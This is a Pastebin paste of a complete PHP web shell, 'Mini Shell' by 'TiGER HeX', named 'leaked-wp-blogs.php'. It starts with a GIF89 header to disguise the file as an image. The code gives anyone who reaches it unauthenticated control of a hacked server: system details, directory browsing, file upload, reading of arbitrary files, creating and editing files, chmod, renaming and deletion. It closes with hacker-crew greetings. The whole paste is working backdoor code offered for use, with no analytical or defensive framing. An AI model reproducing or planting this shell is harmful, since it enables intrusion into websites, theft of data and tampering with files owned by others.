API tools faq
paste
SAINTSATRIA

leaked-wp-blogs.php

SAINTSATRIA
May 14th, 2019
168
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.74 KB | None | 0 0
raw download clone embed print report
  1.  
  2. GIF89;a<?php
  3.  
  4.  
  5. set_time_limit(0);
  6. error_reporting(0);
  7.  
  8. if(get_magic_quotes_gpc()){
  9. foreach($_POST as $key=>$value){
  10. $_POST[$key] = stripslashes($value);
  11. }
  12. }
  13. echo '<!doctype html>
  14. <html>
  15. <head>
  16. <title>Mini Shell &nbsp&nbsp&nbsp&nbsp|&nbsp&nbsp&nbsp&nbsp TiGER HeX</title>
  17. </head>';
  18.  
  19. ?>
  20.  
  21. <style>
  22. @font-face {
  23. font-family: 'Comic Sans MS';
  24. font-style: normal;
  25. font-weight: 400;
  26. src: local('Comic Sans MS'), local('ComicSansMS'), url(http://fonts.gstatic.com/l/font?kit=3oir0CAJ0QJ5h5-A3AP8rRSrmRvs-bRaaQbSAUyiv7A&skey=a4ba60ff9fc73cf8&v=v8) format('truetype');
  27. }
  28. body {
  29.  
  30. background: #000000;line-height: 1;color: #fff;font-family: Comic Sans MS ;
  31.  
  32. }
  33.  
  34. table, th, td {
  35. border-collapse:collapse;
  36. background: transparent;
  37. font-family: Comic Sans MS ;
  38. font-size: 13px;
  39. }
  40. input, textarea { font-family: Comic Sans MS ; }
  41. .table_home, .th_home, .td_home { color:deepskyblue;
  42. border: 1px solid red;
  43. }
  44. th {
  45. padding: 10px;
  46. }
  47. .td_home { padding: 7px; }
  48. select {font-family: Comic Sans MS }
  49. a {color:white}
  50. textarea { width: 100%;height: 400px; }
  51. </style>
  52. <?php
  53.  
  54. echo '</head>
  55. <body><b>
  56. <H1><center><font color="red">Mini Shell</font><font color="#00ff00">&nbsp&nbsp&nbspBy&nbsp&nbsp&nbsp</font><font color="dodgerblue">TiGER HeX</font></center></h1>
  57. <table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
  58.  
  59. <tr><td>
  60.  
  61. <font color="#00ff00"><center>'.php_uname().'</center></font><br>';
  62. if(isset($_GET['path'])){
  63. $path = $_GET['path'];
  64. }else{
  65. $path =
  66.  
  67.  
  68. getcwd();
  69.  
  70. }
  71. $path = str_replace('\\','/',$path);
  72. $paths = explode('/',$path);
  73.  
  74. foreach($paths as $id=>$pat){
  75. if($pat == '' && $id == 0){
  76. $a = true;
  77. echo '<font color=#fff><center>$ root@tiger : <a href="?path=/" style="text-decoration:none;">/</a>';
  78. continue;
  79. }
  80. if($pat == '') continue;
  81. echo '<a href="?path=';
  82. for($i=0;$i<=$id;$i++){
  83. echo "$paths[$i]";
  84. if($i != $id) echo "/";
  85. }
  86. echo '" style="text-decoration:none;">'.$pat.'</a>/';
  87. }
  88. echo '<br><br></font></center></td></tr><tr><td><center>';
  89. if(isset($_FILES['file'])){
  90. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  91. echo '<font color="#00ff00">File Upload</font><br />';
  92. }else{
  93. echo '<font color="red">Upload Failed !!</font><br />';
  94. }
  95. }
  96. echo '</center><center><form enctype="multipart/form-data" method="POST"><font color="black"><input style="background:silver;font-family: Comic Sans MS " type="file" name="file" />
  97. <input type="submit" value="Upload" />
  98. </form></center>
  99. </td></tr>';
  100. if(isset($_GET['filesrc'])){
  101. echo "<tr><td><center>Current File : ";
  102. echo $_GET['filesrc'];
  103. echo '</center></tr></td></table><br />';
  104. echo(' <textarea style="width: 100%;height: 400px;" readonly> '.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</textarea>');
  105. }
  106. //Empety
  107. elseif(isset($_GET['option']) && $_GET['opt'] != 'delete'){
  108. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
  109. //Chmod
  110. if($_GET['opt'] == 'chmod'){
  111. if(isset($_POST['perm'])){
  112. if(chmod($_POST['path'],$_POST['perm'])){
  113. echo '<font color="#00ff00">Change Permission Done </font><br />';
  114. }else{
  115. echo '<font color="red">Change Permission Error </font><br />';
  116. }
  117. }
  118.  
  119. $hell = $_GET['path'];
  120. $yeah = $_GET['name'];
  121. $patc = "$hell/$yeah";
  122.  
  123. echo '<form method="POST">
  124. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($patc)), -4).'" />
  125. <input type="hidden" name="path" value="'.$_POST['path'].'">
  126. <input type="hidden" name="opt" value="chmod">
  127. <input type="submit" value="Go" />
  128. </form>';
  129. }
  130. //
  131. elseif($_GET['opt'] == 'btw'){
  132. $cwd = getcwd();
  133. echo '<form action="?option&path='.$cwd.'&opt=delete&type=buat" method="POST">
  134. New Name : <input name="name" type="text" size="20" value="Folder" />
  135. <input type="hidden" name="path" value="'.$cwd.'">
  136. <input type="hidden" name="opt" value="delete">
  137. <input type="submit" value="Go" />
  138. </form>';
  139. }
  140. //Rename file
  141. elseif($_GET['opt'] == 'rename'){
  142. if(isset($_POST['newname'])){
  143. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
  144. echo '<font color="#00ff00">Change Name Done </font><br />';
  145. }else{
  146. echo '<font color="red">Change Name Error </font><br />';
  147. }
  148. $_POST['name'] = $_POST['newname'];
  149. }
  150. $hell = $_GET['path'];
  151. $yeah = $_GET['name'];
  152. $patc = "$hell/$yeah";
  153. $new = $_POST['newname'];
  154.  
  155. echo '<form method="POST">
  156. New Name : <input name="newname" type="text" size="20" value="'.$new.'" />
  157. <input type="hidden" name="path" value="'.$patc.'">
  158. <input type="hidden" name="opt" value="rename">
  159. <input type="submit" value="Go" />
  160. </form>';
  161. }
  162. //File baru
  163. elseif($_GET['opt'] == 'baru'){
  164.  
  165. $hell = $_GET['path'];
  166. $yeah = $_GET['name'];
  167. $patc = "$hell/$yeah";
  168. $new = $_POST['newname'];
  169. $azz = $_POST['path'];
  170. $newz = "$azz/$new";
  171.  
  172.  
  173. if(isset($_POST['src'])){
  174. $fp = fopen($_POST['path'],'w');
  175. if(fwrite($fp,$_POST['src'])){
  176. echo '<font color="#00ff00">Create File Done [ '.$new.' ]</font><br />';
  177. }else{
  178. echo '<font color="red">Create File Error</font><br />';
  179. }
  180. fclose($fp);
  181. }
  182.  
  183. echo '<form method="POST"> Name : <input name="ngaran1" type="text" size="20" value="'.$new.'" /><input type="submit" name="ngaran" value="Create"/></form><br> ';
  184.  
  185. $ho = $_POST['ngaran1'];
  186.  
  187. if(isset($_POST['ngaran'])){
  188. echo '<form method="POST">
  189. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
  190. <input type="hidden" name="path" value="'.$hell.'/'.$ho.'">
  191. <input type="hidden" name="opt" value="edit">
  192. <input type="submit" value="Go" />
  193. </form>';
  194. }
  195. }
  196. //Edited file
  197. elseif($_GET['opt'] == 'edit'){
  198. if(isset($_POST['src'])){
  199. $fp = fopen($_POST['path'],'w');
  200. if(fwrite($fp,$_POST['src'])){
  201. echo '<font color="#00ff00">Edit File Done </font><br />';
  202. }else{
  203. echo '<font color="red">Edit File Error </font><br />';
  204. }
  205. fclose($fp);
  206. }
  207. $hell = $_GET['path'];
  208. $yeah = $_GET['name'];
  209. $patc = "$hell/$yeah";
  210. echo '<form method="POST">
  211. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($patc)).'</textarea><br />
  212. <input type="hidden" name="path" value="'.$patc.'">
  213. <input type="hidden" name="opt" value="edit">
  214. <input type="submit" value="Go" />
  215. </form>';
  216. }
  217. echo '</center>';
  218. }else{
  219. echo '</table><br /><center>';
  220. //Delete dir and file
  221. if(isset($_GET['option']) && $_GET['opt'] == 'delete'){
  222.  
  223. $hell = $_GET['path'];
  224. $yeah = $_GET['name'];
  225. $patc = "$hell/$yeah";
  226.  
  227. //Delete dir
  228. if($_GET['type'] == 'dir'){
  229.  
  230. if(rmdir($patc)){
  231. echo '<font color="#00ff00">Delete File Done</font><br />';
  232. }else{
  233. echo '<font color="red#">Delete File Error </font><br />';
  234. }
  235. }
  236. //buat folder
  237. if($_GET['type'] == 'buat'){
  238. $haaa = $_POST['path'];
  239. $heee = $_POST['name'];
  240. $hooo = "$haaa/$heee";
  241. $new = $haaa.'/'.htmlspecialchars($heee);
  242. if(!mkdir($new)){
  243. echo '<font color="red">Create Folder Error</font><br />';
  244. }else{
  245. echo '<font color="#00ff00">Create Folder Done </font><br />';
  246. }
  247. }
  248. //Delete file
  249. elseif($_GET['type'] == 'file'){
  250.  
  251. $hell = $_GET['path'];
  252. $yeah = $_GET['name'];
  253. $patc = "$hell/$yeah";
  254.  
  255. if(unlink($patc)){
  256. echo '<font color="#00ff00">Delete File Done</font><br />';
  257. }else{
  258. echo '<font color="red#">Delete File Error </font><br />';
  259. }
  260. }
  261. }
  262. echo '</center>';
  263. $scandir = scandir($path);
  264. $pa = getcwd();
  265. echo ' <table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  266. <tr>
  267. <th class=th_home style="background:black;color:yellow;"><center>Name</center></th>
  268. <th class=th_home style="background:black;color:yellow;" ><center>Size</center></th>
  269. <th class=th_home style="background:black;color:yellow;" ><center>Permission</center></th>
  270. <th class=th_home style="background:black;color:yellow;" ><center>Options</center></th>
  271. </tr> <tr>
  272. <td class=td_home>..</td><td class=td_home align=center>NONE</td> <td class=td_home align=center>LINK</td> <td class=td_home align=center> <a href="?option&path='.$pa.'&opt=baru&name=new.php" style="text-decoration:none;">+ New File</a> | <a href="?option&path='.$pa.'&opt=btw&type=dir" style="text-decoration:none;">+ New Dir</a> </td></tr>
  273. ';
  274.  
  275. foreach($scandir as $dir){
  276. if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  277. echo "
  278. <tr>
  279. <td class=td_home> <img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='> <a href=\"?path=$path/$dir\" style=\"text-decoration:none;\">$dir</a></td>
  280. <td class=td_home ><center>DIR</center></td>
  281. <td class=td_home ><center>";
  282. if(is_writable("$path/$dir")) echo '<font color="#00ff00">';
  283. elseif(!is_readable("$path/$dir")) echo '<font color="red">';
  284. echo perms("$path/$dir");
  285. if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo '</font>';
  286.  
  287. echo "</center></td>
  288. <td class=td_home ><center>
  289. <a href=\"?option&path=$path&opt=rename&type=dir&name=$dir\" style=\"text-decoration:none;\">Rename</a> <a href=\"?option&path=$path&opt=delete&type=dir&name=$dir\" style=\"text-decoration:none;\">Delete</a> <a href=\"?option&path=$path&opt=chmod&type=dir&name=$dir\" style=\"text-decoration:none;\">Chmod</a>
  290.  
  291. </center></td>
  292. </tr>";
  293. }
  294. echo '<br>';
  295. foreach($scandir as $file){
  296. if(!is_file("$path/$file")) continue;
  297. $size = filesize("$path/$file")/1024;
  298. $size = round($size,3);
  299. if($size >= 1024){
  300. $size = round($size/1024,2).' MB';
  301. }else{
  302. $size = $size.' KB';
  303. }
  304.  
  305. echo "<tr>
  306. <td class=td_home > <img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='> <a href=\"?filesrc=$path/$file&path=$path\" style=\"text-decoration:none;\">$file</a></td>
  307. <td class=td_home><center>".$size."</center></td>
  308. <td class=td_home><center>";
  309. if(is_writable("$path/$file")) echo '<font color="#00ff00">';
  310. elseif(!is_readable("$path/$file")) echo '<font color="red">';
  311. echo perms("$path/$file");
  312. if(is_writable("$path/$file") || !is_readable("$path/$file")) echo '</font>';
  313. echo "</center></td>
  314. <td class=td_home><center>
  315. <a href=\"?option&path=$path&opt=edit&type=file&name=$file\" style=\"text-decoration:none;\">Edit |</a> <a href=\"?option&path=$path&opt=rename&type=file&name=$file&path=$path\" style=\"text-decoration:none;\"> Rename |</a> <a href=\"?option&path=$path&opt=delete&type=file&name=$file\" style=\"text-decoration:none;\"> Delete |</a> <a href=\"?option&path=$path&opt=chmod&type=file&name=$file\" style=\"text-decoration:none;\">
  316. Chmod</a>
  317. </center></td>
  318. </tr>";
  319. }
  320. echo '</table>
  321. </div>';
  322. }
  323. echo '<br><pre><font size="5" color="red"><marquee="4"><marquee>Greetz : TiGER M@TE - R3liGiOus HuNt3r - D4RK C0D3R - Leg!on Bomb3r - w43l j@b - MR.Frank69 - H34rtl355 H4CK3R - OP71MU5 - Ultimate Haxor - Ph4nT@M R4Y - Cryptic Hunt3r - L1ON M1N1 - Cyb3r Missilz </marquee></font></pre></body>
  324. </html>';
  325. function perms($file){
  326. $perms = fileperms($file);
  327.  
  328. if (($perms & 0xC000) == 0xC000) {
  329. // Socket
  330. $info = 's';
  331. } elseif (($perms & 0xA000) == 0xA000) {
  332. // Symbolic Link
  333. $info = 'l';
  334. } elseif (($perms & 0x8000) == 0x8000) {
  335. // Regular
  336. $info = '-';
  337. } elseif (($perms & 0x6000) == 0x6000) {
  338. // Block special
  339. $info = 'b';
  340. } elseif (($perms & 0x4000) == 0x4000) {
  341. // Directory
  342. $info = 'd';
  343. } elseif (($perms & 0x2000) == 0x2000) {
  344. // Character special
  345. $info = 'c';
  346. } elseif (($perms & 0x1000) == 0x1000) {
  347. // FIFO pipe
  348. $info = 'p';
  349. } else {
  350. // Unknown
  351. $info = 'u';
  352. }
  353.  
  354. // Owner
  355. $info .= (($perms & 0x0100) ? 'r' : '-');
  356. $info .= (($perms & 0x0080) ? 'w' : '-');
  357. $info .= (($perms & 0x0040) ?
  358. (($perms & 0x0800) ? 's' : 'x' ) :
  359. (($perms & 0x0800) ? 'S' : '-'));
  360.  
  361. // Group
  362. $info .= (($perms & 0x0020) ? 'r' : '-');
  363. $info .= (($perms & 0x0010) ? 'w' : '-');
  364. $info .= (($perms & 0x0008) ?
  365. (($perms & 0x0400) ? 's' : 'x' ) :
  366. (($perms & 0x0400) ? 'S' : '-'));
  367.  
  368. // World
  369. $info .= (($perms & 0x0004) ? 'r' : '-');
  370. $info .= (($perms & 0x0002) ? 'w' : '-');
  371. $info .= (($perms & 0x0001) ?
  372. (($perms & 0x0200) ? 't' : 'x' ) :
  373. (($perms & 0x0200) ? 'T' : '-'));
  374.  
  375. return $info;
  376. }
  377.  
  378. ?>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!